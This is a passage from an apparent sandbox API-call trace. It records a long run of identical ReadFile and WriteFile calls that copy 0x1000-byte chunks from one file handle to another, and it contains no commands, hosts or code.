lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.713] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.714] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.714] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.715] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.715] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.715] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.715] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.715] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.715] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.715] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.716] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.716] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.716] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.716] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.716] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.716] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.716] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.717] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.717] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.717] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.717] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.717] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.717] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.718] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.718] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.718] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.718] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.718] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.718] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.718] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.719] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.719] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.719] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.719] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.719] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.719] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.719] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.720] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.720] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.720] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.720] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.720] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.720] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.721] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.721] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.721] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.721] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.721] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.721] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.722] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.722] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.722] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.722] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.722] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.722] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.722] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.722] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.723] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.723] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.723] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.723] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.723] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.723] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.724] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.724] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.724] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.725] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.725] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.725] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.725] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.725] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.725] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.726] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.726] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.726] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.726] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.726] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.726] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.726] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.727] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.727] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.727] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.727] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.727] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.727] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.727] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.728] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.728] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.728] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.728] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.728] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.728] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.728] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.729] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.729] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.729] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.729] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.729] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.729] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.730] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.730] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: 